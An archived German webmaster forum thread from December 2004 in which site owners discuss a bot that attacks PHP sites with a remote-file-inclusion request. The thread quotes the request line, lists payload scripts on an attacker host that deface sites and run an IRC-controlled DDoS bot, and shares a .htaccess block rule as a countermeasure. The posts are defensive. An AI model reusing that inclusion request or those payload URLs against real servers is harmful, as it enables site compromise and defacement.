Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Script Kiddys ???

Ajax, Hijax, Microformats, RDF, Markup, HTML, PHP, CSS, MySQL, htaccess, robots.txt, CGI, Java, Javascript usw.
Ice Man
PostRank 9
PostRank 9
Beiträge: 2477
Registriert: 04.06.2003, 19:16

Beitrag von Ice Man » 25.12.2004, 14:29

Also ich bekomme seit heute immer die Fehlermeldung, das einer meiner Unterseiten mit dieser Variable aufgerufen wird

click.php?id= (da kommt normalerweise eine meiner IDs )

aber nun kommt immer das

out-click.php?id=https://www.visualcoders.net/spy.gif?&c ... %20php.txt


Ist doch nicht normal oder ?

das gif ist auch etwas komisch, schaut selbst

[www.visualcoders.net/spy.gif]

Kann mir einer sagen was das bedeutet ?

Anzeige von ABAKUS

von Anzeige von ABAKUS »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002
  • persönliche Betreuung
  • individuelle Beratung
  • kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.


Christophe
PostRank 5
PostRank 5
Beiträge: 246
Registriert: 13.12.2004, 13:07

Beitrag von Christophe » 25.12.2004, 14:33

Jemand versucht dich zu hacken. Bei sauber geschriebenen Scripten hat das keine Chance.

treo
PostRank 2
PostRank 2
Beiträge: 39
Registriert: 22.12.2004, 18:29
Wohnort: Mainz

Beitrag von treo » 25.12.2004, 14:41

naja, es ist ein bot der das ganze macht.
Ich hab den etwa 4 mal heute da gehabt,
er kommt aber nicht durch ;)
Suche Linkpartner für inside-PHP.de

Ice Man
PostRank 9
PostRank 9
Beiträge: 2477
Registriert: 04.06.2003, 19:16

Beitrag von Ice Man » 25.12.2004, 14:42

Bin scheinbar nicht der einzigste

https://www.visualcoders.net/viewtopic.php?t=94

Da schreiben viele, das bei denen das selbe ist.
Möglich das deren Forum infiziert von einem Wurm ist, scheinbar haben die ne Version <2.0.11

sean
PostRank 10
PostRank 10
Beiträge: 3396
Registriert: 05.01.2004, 20:26
Wohnort: Leipzig/Karlsruhe

Beitrag von sean » 25.12.2004, 14:50

@Ice Man

Das kommt bei mir auch öfter vor. Wenn man eine print.php, redirect.php oder mailto.php hat versuchen einige darüber andere Webseiten zu laden oder Emails zu versenden.

Man muß das entsprechend absichern, sonst wird über die Scripte gespammt.

sean

treo
PostRank 2
PostRank 2
Beiträge: 39
Registriert: 22.12.2004, 18:29
Wohnort: Mainz

Beitrag von treo » 25.12.2004, 14:56

ja, das muss man, man sollte niemals den Eingaben eines Users vertrauen.

übrigends: ladet euch doch mal das runter was der bot runterladen wollte, man kann ihn so recht gut analysieren weil ja alles als perlscript daher kommt :D
Suche Linkpartner für inside-PHP.de

Pompom
PostRank 10
PostRank 10
Beiträge: 3751
Registriert: 10.09.2004, 16:38

Beitrag von Pompom » 25.12.2004, 15:33

Die versuchen über php mehrere Scripts auf deinen Server zu laden, mit denen
sie herausbekommen können, ob dies geklappt hat.
Wenn: Dann können sie dir auch die "richtigen" Programm unterschieben.

Diese Scripts sind:
https://www.visualcoders.net/spybot.txt
https://www.visualcoders.net/worm1.txt
https://www.visualcoders.net/php.txt
https://www.visualcoders.net/ownz.txt
https://www.visualcoders.net/zone.txt

Wenn es geklappt hat, findest du diese im Verzeichnis
/tmp

Pompom
PostRank 10
PostRank 10
Beiträge: 3751
Registriert: 10.09.2004, 16:38

Beitrag von Pompom » 25.12.2004, 15:41

https://www.visualcoders.net/ownz.txt ist übrigens ein Script zum Deface.
Alle index-Dateien (im /home-Pfad) werden mit

"spykids ownz your server" verziert.

Kann dann z.B. so nett aussehen: https://exce.free.fr/

Ice Man
PostRank 9
PostRank 9
Beiträge: 2477
Registriert: 04.06.2003, 19:16

Beitrag von Ice Man » 25.12.2004, 17:13

ich hab mal ebend folgendes in die -htacces eingetragen

RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple [OR]

damit sollte der Spuck vorerst beendet sein

treo
PostRank 2
PostRank 2
Beiträge: 39
Registriert: 22.12.2004, 18:29
Wohnort: Mainz

Beitrag von treo » 25.12.2004, 17:39

ich habe mir den Wurm mal genauer angeschaut,
wie genau er reinkommt weiß ich bis jetzt zwar immer noch nicht, aber ich weiß was er anstellt wenn er dann mal drin ist,
neben dem Defacement verbindet er sich auch auf einen IRC Server und wartet dann auf aufträge, so kann er z.b. ein DDoS starten.
Außerdem startet er sich nochmal selbst und verbreitet sich weiter,
es wird dabei aber immer nur auf visualcoders.net als quelle zugegriffen um sich zu kopieren
Suche Linkpartner für inside-PHP.de

Ice Man
PostRank 9
PostRank 9
Beiträge: 2477
Registriert: 04.06.2003, 19:16

Beitrag von Ice Man » 25.12.2004, 19:34

sie wie es im Moment ausschaut, wurde die Seite entweder tot gelegt oder der Server ist zusammen gebrochen oder wurde abgeschaltet.

Jedenfalls ist aktuell nix mehr da .... :)

treo
PostRank 2
PostRank 2
Beiträge: 39
Registriert: 22.12.2004, 18:29
Wohnort: Mainz

Beitrag von treo » 25.12.2004, 19:45

ich hab heute morgen ja auch ne mail bei heise gelassen deswegen, bzw. auch ein bisschen Koresspondenz gehalten
Nun gibts auch die passende Tickermeldung:
https://www.heise.de/newsticker/meldung/54623
Suche Linkpartner für inside-PHP.de

Moddy
PostRank 8
PostRank 8
Beiträge: 771
Registriert: 08.09.2004, 11:16

Beitrag von Moddy » 26.12.2004, 19:10

der Wurm dürfte es schwer haben jetzt noch Opfer zu finden, Google hat die abbbfrage Allinurl:Viewtopic.php gestern gesperrt :)

Edit, ur die Abfrage allinurl:viewtopic.php wurde gesperrt, also klein geschrieben :-?

stp69
PostRank 7
PostRank 7
Beiträge: 499
Registriert: 20.02.2004, 14:54

Beitrag von stp69 » 27.12.2004, 10:10

Moin,

auch ich wurde "Opfer" von den htacces .net anfragen. Mein Provider stönte am 2 Weihnachtstag und musste in der Nacht von 25 auf den 26 wohl angeblich wegen mir den Server runterfahren.... obgleich da nur ne kleine XT-Commerce löaung läuft :)

Mein Provider bat mich den Shop upzudaten. Ich werd mal die oben von Ice Man angesprochene Zeile in die htacces eintragen... hoffentlich hilft es.

Gruß
Stephan

opetzold
PostRank 4
PostRank 4
Beiträge: 149
Registriert: 30.11.2004, 22:31

Beitrag von opetzold » 27.12.2004, 16:00

stp69 hat geschrieben:Moin,
Mein Provider stönte am 2 Weihnachtstag und musste in der Nacht von 25 auf den 26 wohl angeblich wegen mir den Server runterfahren.... obgleich da nur ne kleine XT-Commerce löaung läuft :)

Mein Provider bat mich den Shop upzudaten.
Hallo,

IHMO hat dir dein Provider Unsinn erzählt. Ich habe sogar noch die 1 Jahr alte BETA von XTC als Shop laufen und diese hat einen Ansturm von mehreren Bots seit Tagen problemlos überstanden.

Die Idee mit der htacces werde ich trotzdem mal auch probieren.

Gruß Olaf

Antworten
  • Vergleichbare Themen
    Antworten
    Zugriffe
    Letzter Beitrag